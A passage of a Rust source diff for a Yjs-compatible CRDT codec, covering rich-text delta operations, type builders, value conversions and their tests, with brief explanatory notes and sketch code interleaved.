self.kind = kind;
} else {
return Err(JwstCodecError::TypeCastError(kind.as_str()));
}
}
Ok(())
}
}
impl YTypeRef {
pub fn new(kind: YTypeKind, tag_name: Option<String>) -> Self {
Self {
inner: Somr::new(RwLock::new(YType::new(kind, tag_name))),
store: Weak::new(),
}
}
pub fn ty(&self) -> Option<RwLockReadGuard<'_, YType>> {
self.inner.get().and_then(|ty| ty.read().ok())
}
pub fn ty_mut(&self) -> Option<RwLockWriteGuard<'_, YType>> {
self.inner.get().and_then(|ty| ty.write().ok())
}
#[allow(dead_code)]
pub fn store<'a>(&self) -> Option<RwLockReadGuard<'a, DocStore>> {
if let Some(store) = self.store.upgrade() {
let ptr = unsafe { &*Arc::as_ptr(&store) };
Some(ptr.read().unwrap())
} else {
None
}
}
pub fn store_mut<'a>(&self) -> Option<RwLockWriteGuard<'a, DocStore>> {
if let Some(store) = self.store.upgrade() {
let ptr = unsafe { &*Arc::as_ptr(&store) };
Some(ptr.write().unwrap())
} else {
None
}
}
#[allow(dead_code)]
pub fn read(&self) -> Option<(RwLockReadGuard<'_, DocStore>, RwLockReadGuard<'_, YType>)> {
self.store().zip(self.ty())
}
pub fn write(&self) -> Option<(RwLockWriteGuard<'_, DocStore>, RwLockWriteGuard<'_, YType>)> {
self.store_mut().zip(self.ty_mut())
}
}
pub(crate) struct YTypeBuilder {
store: StoreRef,
/// The tag name of XMLElement and XMLHook type
name: Option<String>,
/// The name of the type that directly belongs to the store.
root_name: Option<String>,
kind: YTypeKind,
}
impl YTypeBuilder {
pub fn new(store: StoreRef) -> Self {
Self {
store,
name: None,
root_name: None,
kind: YTypeKind::Unknown,
}
}
pub fn with_kind(mut self, kind: YTypeKind) -> Self {
self.kind = kind;
self
}
pub fn set_name(mut self, name: String) -> Self {
self.root_name = Some(name);
self
}
#[allow(dead_code)]
pub fn set_tag_name(mut self, tag_name: String) -> Self {
self.name = Some(tag_name);
self
}
pub fn build_exists<T: TryFrom<YTypeRef, Error = JwstCodecError>>(self) -> JwstCodecResult<T> {
let store = self.store.read().unwrap();
let ty = if let Some(root_name) = self.root_name {
match store.types.get(&root_name) {
Some(ty) => ty.clone(),
None => {
return Err(JwstCodecError::RootStructNotFound(root_name));
}
}
} else {
return Err(JwstCodecError::TypeCastError("root_name is not set"));
};
drop(store);
T::try_from(ty)
}
pub fn build<T: TryFrom<YTypeRef, Error = JwstCodecError>>(self) -> JwstCodecResult<T> {
let mut store = self.store.write().unwrap();
let ty = if let Some(root_name) = self.root_name {
match store.types.entry(root_name.clone()) {
Entry::Occupied(e) => e.get().clone(),
Entry::Vacant(e) => {
let inner = Somr::new(RwLock::new(YType {
kind: self.kind,
name: self.name,
root_name: Some(root_name),
markers: Self::markers(self.kind),
..Default::default()
}));
let ty = YTypeRef {
store: Arc::downgrade(&self.store),
inner,
};
let ty_ref = ty.clone();
e.insert(ty);
ty_ref
}
}
} else {
let inner = Somr::new(RwLock::new(YType {
kind: self.kind,
name: self.name,
root_name: self.root_name.clone(),
markers: Self::markers(self.kind),
..Default::default()
}));
let ty = YTypeRef {
store: Arc::downgrade(&self.store),
inner,
};
let ty_ref = ty.clone();
store.dangling_types.insert(ty.inner.ptr().as_ptr() as usize, ty);
ty_ref
};
drop(store);
T::try_from(ty)
}
fn markers(kind: YTypeKind) -> Option<MarkerList> {
match kind {
YTypeKind::Map => None,
_ => Some(MarkerList::new()),
}
}
}
#[macro_export(local_inner_macros)]
macro_rules! impl_variants {
({$($name: ident: $codec_ref: literal),*}) => {
#[derive(Debug, Clone, Copy, PartialEq, Default)]
pub enum YTypeKind {
$($name,)*
#[default]
Unknown,
}
impl YTypeKind {
pub fn as_str(&self) -> &'static str {
match self {
$(YTypeKind::$name => std::stringify!($name),)*
YTypeKind::Unknown => "Unknown",
}
}
}
impl From<u64> for YTypeKind {
fn from(value: u64) -> Self {
match value {
$($codec_ref => YTypeKind::$name,)*
_ => YTypeKind::Unknown,
}
}
}
impl From<YTypeKind> for u64 {
fn from(value: YTypeKind) -> Self {
std::debug_assert!(value != YTypeKind::Unknown);
match value {
$(YTypeKind::$name => $codec_ref,)*
_ => std::unreachable!(),
}
}
}
};
}
pub(crate) trait AsInner {
type Inner;
fn as_inner(&self) -> &Self::Inner;
}
#[macro_export(local_inner_macros)]
macro_rules! impl_type {
($name: ident) => {
#[derive(Debug, Clone, PartialEq)]
pub struct $name(pub(crate) super::YTypeRef);
unsafe impl Sync for $name {}
unsafe impl Send for $name {}
impl $name {
pub(crate) fn new(inner: super::YTypeRef) -> Self {
Self(inner)
}
}
impl super::AsInner for $name {
type Inner = super::YTypeRef;
#[inline(always)]
fn as_inner(&self) -> &Self::Inner {
&self.0
}
}
impl TryFrom<super::YTypeRef> for $name {
type Error = $crate::JwstCodecError;
fn try_from(value: super::YTypeRef) -> Result<Self, Self::Error> {
if let Some((_, mut inner)) = value.write() {
match inner.kind {
super::YTypeKind::$name => Ok($name::new(value.clone())),
super::YTypeKind::Unknown => {
inner.set_kind(super::YTypeKind::$name)?;
Ok($name::new(value.clone()))
}
_ => Err($crate::JwstCodecError::TypeCastError(std::stringify!($name))),
}
} else {
Err($crate::JwstCodecError::TypeCastError(std::stringify!($name)))
}
}
}
impl $name {
pub(crate) fn from_unchecked(value: super::YTypeRef) -> Self {
$name::new(value.clone())
}
}
impl From<$name> for super::Value {
fn from(value: $name) -> Self {
Self::$name(value)
}
}
};
}
impl_variants!({
Array: 0,
Map: 1,
Text: 2,
XMLElement: 3,
XMLFragment: 4,
XMLHook: 5,
XMLText: 6
// Doc: 9?
});
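As a rough illustration of what the `impl_variants!` invocation above generates, here is a hand-expanded sketch for three of the variants. The enum is named `Kind` (a hypothetical name, not from the source) to make clear this is not the crate's `YTypeKind`. The numeric codes and the `Unknown` fallback are taken from the macro and its invocation.

```rust
// Hand-expanded sketch of the macro output, limited to three variants.
// `Kind` is a hypothetical stand-in for the generated `YTypeKind`.
#[derive(Debug, Clone, Copy, PartialEq, Default)]
pub enum Kind {
    Array,
    Map,
    Text,
    #[default]
    Unknown,
}

impl Kind {
    /// Variant name as a static string, mirroring `as_str` in the macro.
    pub fn as_str(&self) -> &'static str {
        match self {
            Kind::Array => "Array",
            Kind::Map => "Map",
            Kind::Text => "Text",
            Kind::Unknown => "Unknown",
        }
    }
}

impl From<u64> for Kind {
    /// Unrecognized codes fall back to `Unknown` instead of failing.
    fn from(value: u64) -> Self {
        match value {
            0 => Kind::Array,
            1 => Kind::Map,
            2 => Kind::Text,
            _ => Kind::Unknown,
        }
    }
}

impl From<Kind> for u64 {
    /// `Unknown` has no wire code; as in the macro, converting it is a bug.
    fn from(value: Kind) -> Self {
        debug_assert!(value != Kind::Unknown);
        match value {
            Kind::Array => 0,
            Kind::Map => 1,
            Kind::Text => 2,
            Kind::Unknown => unreachable!(),
        }
    }
}
```

The conversion is lossy in one direction only: any `u64` decodes to some kind, but `Unknown` cannot be encoded back.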
@@ -1,829 +0,0 @@
use std::{collections::BTreeMap, fmt::Display};
use super::{AsInner, list::ListType};
use crate::{
Any, Content, JwstCodecError, JwstCodecResult,
doc::{DocStore, ItemRef, Node, Parent, Somr, YType, YTypeRef},
impl_type,
};
impl_type!(Text);
impl ListType for Text {}
#[derive(Debug, Clone, PartialEq, serde::Serialize, serde::Deserialize)]
#[serde(untagged)]
pub enum TextInsert {
Text(String),
Embed(Vec<Any>),
}
#[derive(Debug, Clone, PartialEq, serde::Serialize, serde::Deserialize)]
#[serde(untagged)]
pub enum TextDeltaOp {
Insert {
insert: TextInsert,
#[serde(skip_serializing_if = "Option::is_none")]
format: Option<TextAttributes>,
},
Retain {
retain: u64,
#[serde(skip_serializing_if = "Option::is_none")]
format: Option<TextAttributes>,
},
Delete {
delete: u64,
},
}
pub type TextDelta = Vec<TextDeltaOp>;
pub type TextAttributes = BTreeMap<String, Any>;
impl Text {
#[inline]
pub fn len(&self) -> u64 {
self.content_len()
}
#[inline]
pub fn is_empty(&self) -> bool {
self.len() == 0
}
#[inline]
pub fn insert<T: ToString>(&mut self, char_index: u64, str: T) -> JwstCodecResult {
self.insert_at(char_index, Content::String(str.to_string()))
}
#[inline]
pub fn remove(&mut self, char_index: u64, len: u64) -> JwstCodecResult {
self.remove_at(char_index, len)
}
pub fn to_delta(&self) -> TextDelta {
let mut ops = Vec::new();
let mut attrs = TextAttributes::new();
for item_ref in self.iter_item() {
if let Some(item) = item_ref.get() {
match &item.content {
Content::Format { key, value } => {
if is_nullish(value) {
attrs.remove(key.as_str());
} else {
attrs.insert(key.to_string(), value.clone());
}
}
Content::String(text) => {
push_insert(&mut ops, TextInsert::Text(text.clone()), &attrs);
}
Content::Embed(embed) => {
push_insert(&mut ops, TextInsert::Embed(vec![embed.clone()]), &attrs);
}
Content::Any(any) => {
push_insert(&mut ops, TextInsert::Embed(any.clone()), &attrs);
}
Content::Json(values) => {
let converted = values
.iter()
.map(|value| value.as_ref().map(|s| Any::String(s.clone())).unwrap_or(Any::Undefined))
.collect::<Vec<_>>();
push_insert(&mut ops, TextInsert::Embed(converted), &attrs);
}
Content::Binary(value) => {
push_insert(&mut ops, TextInsert::Embed(vec![Any::Binary(value.clone())]), &attrs);
}
_ => {}
}
}
}
ops
}
pub fn apply_delta(&mut self, delta: &[TextDeltaOp]) -> JwstCodecResult {
let (mut store, mut ty) = self.as_inner().write().ok_or(JwstCodecError::DocReleased)?;
let parent = self.as_inner().clone();
let mut pos = TextPosition::new(parent, ty.start.clone());
for op in delta {
match op {
TextDeltaOp::Insert { insert, format } => {
let attrs = format.clone().unwrap_or_default();
match insert {
TextInsert::Text(text) => {
insert_text_content(&mut store, &mut ty, &mut pos, Content::String(text.clone()), attrs)?;
}
TextInsert::Embed(values) => {
for value in values {
insert_text_content(
&mut store,
&mut ty,
&mut pos,
Content::Embed(value.clone()),
attrs.clone(),
)?;
}
}
}
}
TextDeltaOp::Retain { retain, format } => {
let attrs = format.clone().unwrap_or_default();
if attrs.is_empty() {
advance_text_position(&mut store, &mut pos, *retain)?;
} else {
format_text(&mut store, &mut ty, &mut pos, *retain, attrs)?;
}
}
TextDeltaOp::Delete { delete } => {
delete_text(&mut store, &mut ty, &mut pos, *delete)?;
}
}
}
Ok(())
}
}
impl Display for Text {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
self.iter_item().try_for_each(|item| {
if let Content::String(str) = &item.get().unwrap().content {
write!(f, "{str}")
} else {
Ok(())
}
})
}
}
impl serde::Serialize for Text {
fn serialize<S>(&self, serializer: S) -> Result<S::Ok, S::Error>
where
S: serde::Serializer,
{
serializer.serialize_str(&self.to_string())
}
}
struct TextPosition {
parent: YTypeRef,
left: ItemRef,
right: ItemRef,
index: u64,
attrs: TextAttributes,
}
impl TextPosition {
fn new(parent: YTypeRef, right: ItemRef) -> Self {
Self {
parent,
left: Somr::none(),
right,
index: 0,
attrs: TextAttributes::new(),
}
}
fn forward(&mut self) {
if let Some(right) = self.right.get() {
if !right.deleted() {
if let Content::Format { key, value } = &right.content {
if is_nullish(value) {
self.attrs.remove(key.as_str());
} else {
self.attrs.insert(key.to_string(), value.clone());
}
} else if right.countable() {
self.index += right.len();
}
}
self.left = self.right.clone();
self.right = right.right.clone();
}
}
}
fn is_nullish(value: &Any) -> bool {
matches!(value, Any::Null | Any::Undefined)
}
fn push_insert(ops: &mut Vec<TextDeltaOp>, insert: TextInsert, attrs: &TextAttributes) {
let format = if attrs.is_empty() { None } else { Some(attrs.clone()) };
if let Some(TextDeltaOp::Insert {
insert: TextInsert::Text(prev),
format: prev_format,
}) = ops.last_mut()
&& let TextInsert::Text(text) = insert
{
if prev_format.as_ref() == format.as_ref() {
prev.push_str(&text);
return;
}
ops.push(TextDeltaOp::Insert {
insert: TextInsert::Text(text),
format,
});
return;
}
ops.push(TextDeltaOp::Insert { insert, format });
}
fn advance_text_position(store: &mut DocStore, pos: &mut TextPosition, mut remaining: u64) -> JwstCodecResult {
while remaining > 0 {
let Some(item) = pos.right.get() else {
return Err(JwstCodecError::IndexOutOfBound(pos.index + remaining));
};
if item.deleted() {
pos.forward();
continue;
}
if matches!(item.content, Content::Format { .. }) {
pos.forward();
continue;
}
let item_len = item.len();
if remaining < item_len {
let (left, right) = store.split_node(item.id, remaining)?;
pos.left = left.as_item();
pos.right = right.as_item();
pos.index += remaining;
break;
}
remaining -= item_len;
pos.forward();
}
Ok(())
}
fn minimize_attribute_changes(pos: &mut TextPosition, attrs: &TextAttributes) {
while let Some(item) = pos.right.get() {
if item.deleted() {
pos.forward();
continue;
}
if let Content::Format { key, value } = &item.content {
let attr = attrs.get(key.as_str()).cloned().unwrap_or(Any::Null);
if attr == *value {
pos.forward();
continue;
}
}
break;
}
}
fn insert_item(store: &mut DocStore, ty: &mut YType, pos: &mut TextPosition, content: Content) -> JwstCodecResult {
if let Some(markers) = &ty.markers
&& content.countable()
{
markers.update_marker_changes(pos.index, content.clock_len() as i64);
}
let item = store.create_item(
content,
pos.left.clone(),
pos.right.clone(),
Some(Parent::Type(pos.parent.clone())),
None,
);
let item_ref = item.clone();
store.integrate(Node::Item(item), 0, Some(ty))?;
pos.right = item_ref;
pos.forward();
Ok(())
}
fn insert_attributes(
store: &mut DocStore,
ty: &mut YType,
pos: &mut TextPosition,
attrs: &TextAttributes,
) -> JwstCodecResult<TextAttributes> {
let mut negated = TextAttributes::new();
for (key, value) in attrs {
let current = pos.attrs.get(key.as_str()).cloned().unwrap_or(Any::Null);
if current == *value {
continue;
}
negated.insert(key.to_string(), current);
insert_item(
store,
ty,
pos,
Content::Format {
key: key.to_string(),
value: value.clone(),
},
)?;
}
Ok(negated)
}
fn insert_negated_attributes(
store: &mut DocStore,
ty: &mut YType,
pos: &mut TextPosition,
mut negated: TextAttributes,
) -> JwstCodecResult {
while let Some(item) = pos.right.get() {
if item.deleted() {
pos.forward();
continue;
}
if let Content::Format { key, value } = &item.content
&& let Some(negated_value) = negated.get(key.as_str())
&& negated_value == value
{
negated.remove(key.as_str());
pos.forward();
continue;
}
break;
}
for (key, value) in negated {
insert_item(
store,
ty,
pos,
Content::Format {
key: key.to_string(),
value,
},
)?;
}
Ok(())
}
fn insert_text_content(
store: &mut DocStore,
ty: &mut YType,
pos: &mut TextPosition,
content: Content,
mut attrs: TextAttributes,
) -> JwstCodecResult {
for key in pos.attrs.keys() {
if !attrs.contains_key(key.as_str()) {
attrs.insert(key.to_string(), Any::Null);
}
}
minimize_attribute_changes(pos, &attrs);
let negated = insert_attributes(store, ty, pos, &attrs)?;
insert_item(store, ty, pos, content)?;
insert_negated_attributes(store, ty, pos, negated)?;
Ok(())
}
fn format_text(
store: &mut DocStore,
ty: &mut YType,
pos: &mut TextPosition,
mut remaining: u64,
attrs: TextAttributes,
) -> JwstCodecResult {
if remaining == 0 {
return Ok(());
}
minimize_attribute_changes(pos, &attrs);
let mut negated = insert_attributes(store, ty, pos, &attrs)?;
while remaining > 0 {
let Some(item) = pos.right.get() else {
break;
};
if item.deleted() {
pos.forward();
continue;
}
match &item.content {
Content::Format { key, value } => {
if let Some(attr) = attrs.get(key.as_str()) {
if attr == value {
negated.remove(key.as_str());
} else {
negated.insert(key.to_string(), value.clone());
}
store.delete_item(item, Some(ty));
pos.forward();
} else {
pos.forward();
}
}
_ => {
let item_len = item.len();
if remaining < item_len {
store.split_node(item.id, remaining)?;
remaining = 0;
} else {
remaining -= item_len;
}
pos.forward();
}
}
}
insert_negated_attributes(store, ty, pos, negated)?;
Ok(())
}
fn delete_text(store: &mut DocStore, ty: &mut YType, pos: &mut TextPosition, mut remaining: u64) -> JwstCodecResult {
if remaining == 0 {
return Ok(());
}
let start = remaining;
while remaining > 0 {
let item_ref = pos.right.clone();
let Some((indexable, item_len, item_id)) = item_ref.get().map(|item| (item.indexable(), item.len(), item.id))
else {
break;
};
if indexable {
if remaining < item_len {
store.split_node(item_id, remaining)?;
remaining = 0;
} else {
remaining -= item_len;
}
if let Some(item) = item_ref.get() {
store.delete_item(item, Some(ty));
}
}
pos.forward();
}
if let Some(markers) = &ty.markers {
markers.update_marker_changes(pos.index, -((start - remaining) as i64));
}
Ok(())
}
#[cfg(test)]
mod tests {
use rand::{Rng, SeedableRng};
use rand_chacha::ChaCha20Rng;
use yrs::{Options, Text, Transact};
use super::{TextAttributes, TextDeltaOp, TextInsert};
#[cfg(not(loom))]
use crate::sync::{Arc, AtomicUsize, Ordering};
use crate::{Any, Doc, loom_model, sync::thread};
#[test]
fn test_manipulate_text() {
loom_model!({
let doc = Doc::new();
let mut text = doc.create_text().unwrap();
text.insert(0, "llo").unwrap();
text.insert(0, "he").unwrap();
text.insert(5, " world").unwrap();
text.insert(6, "great ").unwrap();
text.insert(17, '!').unwrap();
assert_eq!(text.to_string(), "hello great world!");
assert_eq!(text.len(), 18);
text.remove(4, 4).unwrap();
assert_eq!(text.to_string(), "helleat world!");
assert_eq!(text.len(), 14);
});
}
#[test]
#[cfg(not(loom))]
fn test_parallel_insert_text() {
let seed = rand::rng().random();
let rand = ChaCha20Rng::seed_from_u64(seed);
let mut handles = Vec::new();
let doc = Doc::with_client(1);
let mut text = doc.get_or_create_text("test").unwrap();
text.insert(0, "This is a string with length 32.").unwrap();
let added_len = Arc::new(AtomicUsize::new(32));
// parallel editing text
{
for i in 0..2 {
let mut text = text.clone();
let mut rand = rand.clone();
let len = added_len.clone();
handles.push(thread::spawn(move || {
for j in 0..10 {
let pos = rand.random_range(0..text.len());
let string = format!("hello {}", i * j);
text.insert(pos, &string).unwrap();
len.fetch_add(string.len(), Ordering::SeqCst);
}
}));
}
}
// parallel editing doc
{
for i in 0..2 {
let doc = doc.clone();
let mut rand = rand.clone();
let len = added_len.clone();
handles.push(thread::spawn(move || {
let mut text = doc.get_or_create_text("test").unwrap();
for j in 0..10 {
let pos = rand.random_range(0..text.len());
let string = format!("hello doc{}", i * j);
text.insert(pos, &string).unwrap();
len.fetch_add(string.len(), Ordering::SeqCst);
}
}));
}
}
for handle in handles {
handle.join().unwrap();
}
assert_eq!(text.to_string().len(), added_len.load(Ordering::SeqCst));
assert_eq!(text.len(), added_len.load(Ordering::SeqCst) as u64);
}
#[cfg(not(loom))]
fn parallel_ins_del_text(seed: u64, thread: i32, iteration: i32) {
let doc = Doc::with_client(1);
let rand = ChaCha20Rng::seed_from_u64(seed);
let mut text = doc.get_or_create_text("test").unwrap();
text.insert(0, "This is a string with length 32.").unwrap();
let mut handles = Vec::new();
let len = Arc::new(AtomicUsize::new(32));
for i in 0..thread {
let len = len.clone();
let mut rand = rand.clone();
let text = text.clone();
handles.push(thread::spawn(move || {
for j in 0..iteration {
let len = len.clone();
let mut text = text.clone();
let ins = i % 2 == 0;
let pos = rand.random_range(0..16);
if ins {
let str = format!("hello {}", i * j);
text.insert(pos, &str).unwrap();
len.fetch_add(str.len(), Ordering::SeqCst);
} else {
text.remove(pos, 6).unwrap();
len.fetch_sub(6, Ordering::SeqCst);
}
}
}));
}
for handle in handles {
handle.join().unwrap();
}
assert_eq!(text.to_string().len(), len.load(Ordering::SeqCst));
assert_eq!(text.len(), len.load(Ordering::SeqCst) as u64);
}
#[test]
#[cfg(not(loom))]
fn test_parallel_ins_del_text() {
// seeds that previously failed because of
// wrong left/right refs
parallel_ins_del_text(973078538, 2, 2);
parallel_ins_del_text(18414938500869652479, 2, 2);
}
#[test]
fn loom_parallel_ins_del_text() {
let seed = rand::rng().random();
let mut rand = ChaCha20Rng::seed_from_u64(seed);
let ranges = (0..20).map(|_| rand.random_range(0..16)).collect::<Vec<_>>();
loom_model!({
let doc = Doc::new();
let mut text = doc.get_or_create_text("test").unwrap();
text.insert(0, "This is a string with length 32.").unwrap();
// enough for loom
let handles = (0..2)
.map(|i| {
let text = text.clone();
let ranges = ranges.clone();
thread::spawn(move || {
let mut text = text.clone();
let ins = i % 2 == 0;
let pos = ranges[i];
if ins {
let str = format!("hello {}", i);
text.insert(pos, &str).unwrap();
} else {
text.remove(pos, 6).unwrap();
}
})
})
.collect::<Vec<_>>();
for handle in handles {
handle.join().unwrap();
}
});
}
#[test]
#[cfg_attr(miri, ignore)]
fn test_recover_from_yjs_encoder() {
let yrs_options = Options {
client_id: rand::random(),
guid: nanoid::nanoid!().into(),
..Default::default()
};
loom_model!({
let binary = {
let doc = yrs::Doc::with_options(yrs_options.clone());
let text = doc.get_or_insert_text("greating");
let mut trx = doc.transact_mut();
text.insert(&mut trx, 0, "hello");
text.insert(&mut trx, 5, " world!");
text.remove_range(&mut trx, 11, 1);
trx.encode_update_v1()
};
// in loom loop
#[allow(clippy::needless_borrow)]
let doc = Doc::try_from_binary_v1(&binary).unwrap();
let mut text = doc.get_or_create_text("greating").unwrap();
assert_eq!(text.to_string(), "hello world");
text.insert(6, "great ").unwrap();
text.insert(17, '!').unwrap();
assert_eq!(text.to_string(), "hello great world!");
});
}
#[test]
fn test_recover_from_octobase_encoder() {
loom_model!({
let binary = {
let doc = Doc::new();
let mut text = doc.get_or_create_text("greating").unwrap();
text.insert(0, "hello").unwrap();
text.insert(5, " world!").unwrap();
text.remove(11, 1).unwrap();
doc.encode_update_v1().unwrap()
};
let doc = Doc::try_from_binary_v1(binary).unwrap();
let mut text = doc.get_or_create_text("greating").unwrap();
assert_eq!(text.to_string(), "hello world");
text.insert(6, "great ").unwrap();
text.insert(17, '!').unwrap();
assert_eq!(text.to_string(), "hello great world!");
});
}
#[test]
fn test_text_delta_insert_format() {
loom_model!({
let doc = Doc::new();
let mut text = doc.get_or_create_text("text").unwrap();
let mut attrs = TextAttributes::new();
attrs.insert("bold".to_string(), Any::True);
text
.apply_delta(&[TextDeltaOp::Insert {
insert: TextInsert::Text("abc".to_string()),
format: Some(attrs.clone()),
}])
.unwrap();
assert_eq!(text.to_string(), "abc");
assert_eq!(
text.to_delta(),
vec![TextDeltaOp::Insert {
insert: TextInsert::Text("abc".to_string()),
format: Some(attrs),
}]
);
});
}
#[test]
fn test_text_delta_retain_format() {
loom_model!({
let doc = Doc::new();
let mut text = doc.get_or_create_text("text").unwrap();
text
.apply_delta(&[TextDeltaOp::Insert {
insert: TextInsert::Text("abc".to_string()),
format: None,
}])
.unwrap();
let mut attrs = TextAttributes::new();
attrs.insert("bold".to_string(), Any::True);
text
.apply_delta(&[TextDeltaOp::Retain {
retain: 1,
format: Some(attrs.clone()),
}])
.unwrap();
assert_eq!(
text.to_delta(),
vec![
TextDeltaOp::Insert {
insert: TextInsert::Text("a".to_string()),
format: Some(attrs),
},
TextDeltaOp::Insert {
insert: TextInsert::Text("bc".to_string()),
format: None,
}
]
);
});
}
#[test]
fn test_text_delta_utf16_retain() {
loom_model!({
let doc = Doc::new();
let mut text = doc.get_or_create_text("text").unwrap();
text
.apply_delta(&[TextDeltaOp::Insert {
insert: TextInsert::Text("😀".to_string()),
format: None,
}])
.unwrap();
let mut attrs = TextAttributes::new();
attrs.insert("bold".to_string(), Any::True);
text
.apply_delta(&[TextDeltaOp::Retain {
retain: 2,
format: Some(attrs.clone()),
}])
.unwrap();
assert_eq!(
text.to_delta(),
vec![TextDeltaOp::Insert {
insert: TextInsert::Text("😀".to_string()),
format: Some(attrs),
}]
);
});
}
}
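`test_text_delta_utf16_retain` retains 2 units to cover a single emoji. That matches text lengths being counted in UTF-16 code units, which is an inference from the test name and its expected delta, not something this diff states about the crate's internals. A minimal standard-library sketch of the difference between the two counts, with hypothetical helper names:

```rust
/// Length of `s` in UTF-16 code units (the unit the retain count in the
/// test appears to use; this is an assumption inferred from the test).
fn utf16_len(s: &str) -> u64 {
    s.encode_utf16().count() as u64
}

/// Length of `s` in Unicode scalar values (Rust `char`s).
fn char_len(s: &str) -> u64 {
    s.chars().count() as u64
}
```

For `"😀"`, `utf16_len` returns 2 while `char_len` returns 1, so a retain of 1 would stop in the middle of a surrogate pair.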
@@ -1,157 +0,0 @@
use std::fmt::Display;
use super::*;
#[derive(Debug, Clone, PartialEq)]
pub enum Value {
Any(Any),
Doc(Doc),
Array(Array),
Map(Map),
Text(Text),
XMLElement(XMLElement),
XMLFragment(XMLFragment),
XMLHook(XMLHook),
XMLText(XMLText),
}
impl Value {
pub fn to_any(&self) -> Option<Any> {
match self {
Value::Any(any) => Some(any.clone()),
_ => None,
}
}
pub fn to_array(&self) -> Option<Array> {
match self {
Value::Array(array) => Some(array.clone()),
_ => None,
}
}
pub fn to_map(&self) -> Option<Map> {
match self {
Value::Map(map) => Some(map.clone()),
_ => None,
}
}
pub fn to_text(&self) -> Option<Text> {
match self {
Value::Text(text) => Some(text.clone()),
_ => None,
}
}
pub fn from_vec<T: Into<Any>>(el: Vec<T>) -> Self {
Value::Any(Any::Array(el.into_iter().map(|item| item.into()).collect::<Vec<_>>()))
}
}
impl From<&Content> for Value {
fn from(value: &Content) -> Value {
match value {
Content::Any(any) => Value::Any(if any.len() == 1 {
any[0].clone()
} else {
Any::Array(any.clone())
}),
Content::String(s) => Value::Any(Any::String(s.clone())),
Content::Json(json) => Value::Any(Any::Array(
json
.iter()
.map(|item| {
if let Some(s) = item {
Any::String(s.clone())
} else {
Any::Undefined
}
})
.collect::<Vec<_>>(),
)),
Content::Binary(buf) => Value::Any(Any::Binary(buf.clone())),
Content::Embed(v) => Value::Any(v.clone()),
Content::Type(ty) => match ty.ty().unwrap().kind {
YTypeKind::Array => Value::Array(Array::from_unchecked(ty.clone())),
YTypeKind::Map => Value::Map(Map::from_unchecked(ty.clone())),
YTypeKind::Text => Value::Text(Text::from_unchecked(ty.clone())),
YTypeKind::XMLElement => Value::XMLElement(XMLElement::from_unchecked(ty.clone())),
YTypeKind::XMLFragment => Value::XMLFragment(XMLFragment::from_unchecked(ty.clone())),
YTypeKind::XMLHook => Value::XMLHook(XMLHook::from_unchecked(ty.clone())),
YTypeKind::XMLText => Value::XMLText(XMLText::from_unchecked(ty.clone())),
// actually unreachable
YTypeKind::Unknown => Value::Any(Any::Undefined),
},
Content::Doc { guid: _, opts } => Value::Doc(
DocOptions::try_from(opts.clone())
.expect("Failed to parse doc options")
.build(),
),
Content::Format { .. } => unimplemented!(),
// actually unreachable
Content::Deleted(_) => Value::Any(Any::Undefined),
}
}
}
impl From<Value> for Content {
fn from(value: Value) -> Self {
match value {
Value::Any(any) => Content::from(any),
Value::Doc(doc) => Content::Doc {
guid: doc.guid().to_owned(),
opts: Any::from(doc.options().clone()),
},
Value::Array(v) => Content::Type(v.0),
Value::Map(v) => Content::Type(v.0),
Value::Text(v) => Content::Type(v.0),
Value::XMLElement(v) => Content::Type(v.0),
Value::XMLFragment(v) => Content::Type(v.0),
Value::XMLHook(v) => Content::Type(v.0),
Value::XMLText(v) => Content::Type(v.0),
}
}
}
impl<T: Into<Any>> From<T> for Value {
fn from(value: T) -> Self {
Value::Any(value.into())
}
}
impl From<Doc> for Value {
fn from(value: Doc) -> Self {
Value::Doc(value)
}
}
impl Display for Value {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
match self {
Value::Any(any) => write!(f, "{any}"),
Value::Text(text) => write!(f, "{text}"),
_ => write!(f, ""),
}
}
}
impl serde::Serialize for Value {
fn serialize<S>(&self, serializer: S) -> Result<S::Ok, S::Error>
where
S: serde::Serializer,
{
match self {
Self::Any(any) => any.serialize(serializer),
Self::Array(array) => array.serialize(serializer),
Self::Map(map) => map.serialize(serializer),
Self::Text(text) => text.serialize(serializer),
// Self::XMLElement(xml_element) => xml_element.serialize(serializer),
// Self::XMLFragment(xml_fragment) => xml_fragment.serialize(serializer),
// Self::XMLHook(xml_hook) => xml_hook.serialize(serializer),
// Self::XMLText(xml_text) => xml_text.serialize(serializer),
// Self::Doc(doc) => doc.serialize(serializer),
_ => serializer.serialize_none(),
}
}
}
@@ -1,14 +0,0 @@
use super::list::ListType;
use crate::impl_type;
impl_type!(XMLElement);
impl ListType for XMLElement {}
impl_type!(XMLFragment);
impl ListType for XMLFragment {}
impl_type!(XMLText);
impl ListType for XMLText {}
impl_type!(XMLHook);
impl ListType for XMLHook {}
@@ -1,44 +0,0 @@
use super::*;
pub fn encode_awareness_as_message(awareness: AwarenessStates) -> JwstCodecResult<Vec<u8>> {
let mut buffer = Vec::new();
write_sync_message(&mut buffer, &SyncMessage::Awareness(awareness))
.map_err(|e| JwstCodecError::InvalidWriteBuffer(e.to_string()))?;
Ok(buffer)
}
pub fn encode_update_as_message(update: Vec<u8>) -> JwstCodecResult<Vec<u8>> {
let mut buffer = Vec::new();
write_sync_message(&mut buffer, &SyncMessage::Doc(DocMessage::Update(update)))
.map_err(|e| JwstCodecError::InvalidWriteBuffer(e.to_string()))?;
Ok(buffer)
}
pub fn merge_updates_v1<V: AsRef<[u8]>, I: IntoIterator<Item = V>>(updates: I) -> JwstCodecResult<Update> {
let updates = updates
.into_iter()
.map(Update::decode_v1)
.collect::<JwstCodecResult<Vec<_>>>()?;
Ok(Update::merge(updates))
}
/// Generates a random number that tends to be small.
/// Since the client id is included in every CRDT item, a
/// small client id helps to reduce the binary size.
///
/// NOTE: about 36.8% (roughly 1/e) of the numbers generated by
/// this function are greater than [u32::MAX].
pub fn prefer_small_random() -> u64 {
use rand::{distr::Distribution, rng};
use rand_distr::Exp;
let scale_factor = u16::MAX as f64;
let v: f64 = Exp::new(1.0 / scale_factor)
.map(|exp| exp.sample(&mut rng()))
.unwrap_or_else(|_| rand::random());
(v * scale_factor) as u64
}
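The note on `prefer_small_random` about values exceeding `u32::MAX` can be checked analytically. The sketch assumes `Exp::new` takes the rate parameter, so the sample has mean `scale_factor`, and it ignores the fallback branch. The helper name `tail_probability` is hypothetical.

```rust
/// Probability that `scale * X` exceeds `threshold`, where X is
/// exponentially distributed with rate `1 / scale` (mean `scale`).
fn tail_probability(scale: f64, threshold: f64) -> f64 {
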